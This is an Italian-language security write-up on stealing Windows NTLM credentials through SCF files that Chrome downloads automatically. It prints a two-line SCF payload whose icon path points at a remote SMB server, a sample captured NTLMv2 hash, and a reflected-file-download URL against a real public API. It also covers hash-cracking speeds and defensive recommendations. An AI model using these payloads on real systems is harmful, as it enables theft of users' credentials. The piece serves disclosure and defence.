Gli attacchi delle credenziali di autenticazione che utilizzano il protocollo di condivisione file SMB in ambiente
Windows sono un problema attuale.
Questo documento descrive un attacco che può portare al furto delle credenziali di Windows, interessando la
configurazione predefinita del browser più diffuso oggi al mondo, Google Chrome, nonché tutte le versioni di Windows che lo supportano.
Il Problema
Con la sua configurazione predefinita, il browser Chrome scarica automaticamente i file che ritiene sicuri senza
richiedere all’utente un percorso di download ma utilizzando invece quello preimpostato. Dal punto di vista della sicurezza, questo metodo non è un comportamento ideale, infatti qualsiasi contenuto richiede comunque all’utente di aprire/eseguire manualmente il file. Tuttavia, ci sono tipi di file che non richiedono alcuna
interazione da parte dell’utente per eseguire azioni dannose? Ci sono tipi di file che possono farlo?
Windows Explorer Shell Command File o SCF (.scf) è un tipo di file meno conosciuto che risale a Windows 98. La maggior parte degli utenti di Windows lo trovava in Windows 98/ME/NT/2000/XP dove è stato utilizzato principalmente come scorciatoia per mostrare il desktop.Questo è essenzialmente un file di testo con sezioni che determinano un comando da eseguire (limitato all’esecuzione di Explorer e all’attivazione del desktop) e una posizione del file icona.
un esempio, che Mostra il contenuto del desktop potrebbe essere questo
[Shell] Command=2
IconFile=explorer.exe,3
[Taskbar] Command=ToggleDesktop
Come con i file LNK di collegamento di Windows, la posizione dell’icona viene risolta automaticamente quando il file viene visualizzato in Explorer. L’impostazione di una posizione dell’icona su un server SMB remoto è un noto vettore di attacco che usa la funzione di autenticazione automatica di Windows quando si accede a servizi come condivisioni di file remote. Ma qual è la differenza tra LNK e SCF dal punto di vista dell’attacco? Chrome disinfetta i file LNK tramite l’estensione di download ma non riserva lo stesso trattamento ai file SCF.
Il file SCF che può essere utilizzato per ingannare Windows in un tentativo di autenticazione a un server SMB remoto contiene solo due righe, come mostrato nell’esempio seguente:
[Shell]
IconFile=\170.170.170.170\icon
Una volta scaricato, la richiesta viene attivata nel momento stesso in cui viene aperta la directory di download
in Explorer di Windows per visualizzare il file, eliminarlo o altro. Non è necessario fare clic o aprire il file scaricato: Explorer di Windows tenterà automaticamente di recuperare l’icona.
Il server SMB remoto configurato dall’aggressore è pronto a catturare il nome utente e l’hash della password della vittima per il cracking offline o inoltrare la connessione a un servizio disponibile esternamente che accetta lo stesso tipo di autenticazione (ad esempio Microsoft Exchange). Le informazioni acquisite possono essere simili alle seguenti:
[*] SMB Captured – 2017-05-15 13:10:44 +0200 NTLMv2 Response Captured from 173.203.29.182:62521 – 173.203.29.182 USER:Bosko DOMAIN:Master OS: LM: LMHASH:Disabled LM_CLIENT_CHALLENGE:Disabled NTHASH:98daf39c3a253bbe4a289e7a746d4b24 NT_CLIENT_CHALLENGE:01010000000000000e5f83e06fcdd201ccf26d91cd9e326e00000000020000000000000000000000
Bosko::Master:1122334455667788:98daf39c3a253bbe4a289e7a746d4b24:01010000000000000e5f83e06fcdd201ccf26d91cd9e326e00000000020000000000000000000000
L’esempio sopra mostra una divulgazione del nome utente, del dominio e dell’hash della password NTLMv2 della vittima.
Vale la pena ricordare che i file SCF appariranno senza estensione in Esplora risorse indipendentemente dalle
impostazioni di file e cartelle. Pertanto, il file denominato picture.jpg.scf verrà visualizzato in Esplora risorse come
picture.jpg. Questo rende praticamente invisibili gli attacchi che utilizzano file SCF.
Divulgazione della password
Per gli utenti nei domini di Active Directory (reti aziendali, governative e di altro tipo), la divulgazione della
password può avere vari impatti che vanno dall’escalation delle violazioni della rete interna all’accesso a servizi
abilitati per NTLM disponibili esternamente e violazioni basate sul riutilizzo della password.
Per gli utenti di Windows 8/10 che utilizzano un account Microsoft (MSA) invece di un account locale, la
divulgazione della password ha effetto su tutti i servizi Microsoft integrati con MSA SSO come OneDrive,
Outlook.com, Office 365, Office Online, Skype, Xbox Live e altri. Il problema comune del riutilizzo della
password può portare a più violazioni dell’account non correlate a MSA.
Del resto il cracking delle password offline, è migliorato notevolmente negli ultimi anni specialmente con il cracking basato su GPU. Il benchmark hashcat NetNTLMv2 per una singola scheda Nvidia GTX 1080 è di circa 1600 MH/s.
Sono 1,6 miliardi di hash al secondo. Per una password di 8 caratteri, i rig GPU di 4 di queste carte possono provare un intero spazio di chiavi e di caratteri alfanumerici superiori/inferiori + caratteri speciali più comunemente usati (!@ #$%& ) in meno di un giorno. Con centinaia di milioni di password trapelate risultanti da diverse violazioni negli ultimi anni (LinkedIn, Myspace), il cracking basato su regole di elenchi di parole può produrre risultati sorprendenti contro password complesse.
La situazione è ancora peggiore per i sistemi e le reti Windows XP in cui è stata esplicitamente abilitata la
retrocompatibilità con NTLMv1. In questi casi, è possibile eseguire un attacco di downgrade costringendo il
client ad autenticarsi con un hash/protocollo più debole (come NTLMv1 o anche LM) invece di NTLMv2. Ciò
consente all’attaccante di acquisire un hash che può essere violato molto più velocemente di NTLMv2,
nel caso di LM spesso in pochi secondi utilizzando tabelle precalcolate per invertire le funzioni hash
crittografiche (“Rainbow tables”).
Gestione antivirus di SCF
Naturalmente, quando un browser non riesce ad avvisare o disinfettare i download di tipi di file potenzialmente
pericolosi, ci si affida invece alle soluzioni di sicurezza per farlo funzionare. Testando diverse soluzioni antivirus leader di diversi fornitori nessuno è riuscito a contrassegnarlo come sospetto. Quindi l’analisi del file SCF facile da implementare sembra la più promettente, in quanto richiede solo l’ispezione del parametro icon considerando che non ci sono usi legittimi di SCF con posizioni di icone remote.
Download del file riflesso
Descritto per la prima volta da Oren Hafif, la vulnerabilità Reflected File Download si verifica quando un input utente appositamente predisposto viene riflesso nella risposta del sito Web e scaricato dal browser dell’utente quando vengono soddisfatte determinate condizioni. Inizialmente è stato utilizzato come vettore di attacco per indurre l’utente a eseguire codice dannoso (di solito da un file batch di Windows), in base alla fiducia dell’utente nel dominio vulnerabile.
Poiché il formato SCF è piuttosto semplice e il nostro attacco richiede solo due righe che possono essere precedute e seguite da (quasi) qualsiasi cosa, crea condizioni perfette per essere utilizzato con RFD, poiché spesso utilizzano la mappatura URL permissiva, che consente di impostare l’estensione del file nel percorso dell’URL. Chrome non scaricherà direttamente la maggior parte dei tipici tipi di contenuto di risposta API, quindi questi possono essere forzati attraverso un attributo tag di download come <a href=… l
se la risposta contiene un carattere non stampabile verrà scaricata come file direttamente e automaticamente a meno che non sia impostata la direttiva “nosniff”.
utilizzando il seguente URL:
http://api.worldbank.org/v2/country/indicator/iwantyourhash.scf?prefix= %0A[Shell]%0AIconFile=\170.170.170.170\test%0Alol=%0B&format=jsonp
A causa del carattere non stampabile %0B Chrome scaricherà la risposta come file iwantyourhash.scf. Nel momento in cui viene aperta la directory di download contenente il file, Windows proverà ad autenticarsi sul server SMB remoto, rivelando gli hash di autenticazione della vittima.
Raccomandazioni
Per disabilitare i download automatici in Google Chrome, è necessario apportare le seguenti modifiche:
Impostazioni->mostra impostazioni avanzate->Controlla opzione dove salvare ogni file prima di scaricarlo. L’approvazione manuale di ogni tentativo di download riduce significativamente il rischio di attacchi di
furto di credenziali NTLMv2 tramite file SCF.
Poiché i file SCF rappresentano ancora una minaccia, le misure da adottare dipendono dall’ambiente di rete degli utenti interessati e vanno dal semplice rafforzamento a livello di host e configurazione delle regole del firewall all’applicazione di misure di sicurezza aggiuntive come la firma dei pacchetti SMB.
Conclusione
Attualmente, l’aggressore deve solo indurre la vittima (utilizzando Google Chrome e Windows completamente aggiornati) a visitare il suo sito Web per poter procedere e riutilizzare le credenziali di autenticazione della vittima. Anche se la vittima non è un utente privilegiato (ad esempio, un amministratore), tale vulnerabilità potrebbe rappresentare una minaccia significativa per le grandi organizzazioni in quanto consente all’aggressore di sostituirsi ai membri dell’organizzazione. Un simile utente malintenzionato potrebbe riutilizzare immediatamente i privilegi acquisiti per intensificare ulteriormente l’accesso ed eseguire
attacchi ad altri utenti o ottenere l’accesso e il controllo delle risorse IT.
